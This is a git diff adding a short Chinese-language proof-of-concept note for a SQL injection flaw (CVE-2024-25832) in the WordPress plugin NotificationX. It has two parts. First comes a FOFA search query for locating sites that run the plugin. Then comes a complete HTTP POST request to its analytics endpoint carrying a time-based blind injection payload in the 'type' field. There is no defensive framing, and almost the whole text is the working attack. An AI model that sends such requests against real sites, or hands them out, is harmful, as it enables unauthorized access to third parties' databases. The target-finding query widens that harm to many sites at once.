diff --git a/WordPress插件NotificationX存在sql注入漏洞(CVE-2024-25832).md b/WordPress插件NotificationX存在sql注入漏洞(CVE-2024-25832).md
new file mode 100644
index 0000000..efd6b3e
--- /dev/null
+++ b/WordPress插件NotificationX存在sql注入漏洞(CVE-2024-25832).md
@@ -0,0 +1,15 @@
+## WordPress插件NotificationX存在sql注入漏洞(CVE-2024-25832)
+
+## fofa
+```
+body="/wp-content/plugins/notificationx"
+```
+
+## poc
+```
+POST /wp-json/notificationx/v1/analytics HTTP/1.1
+Host: 
+Content-Type: application/json
+
+{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
+```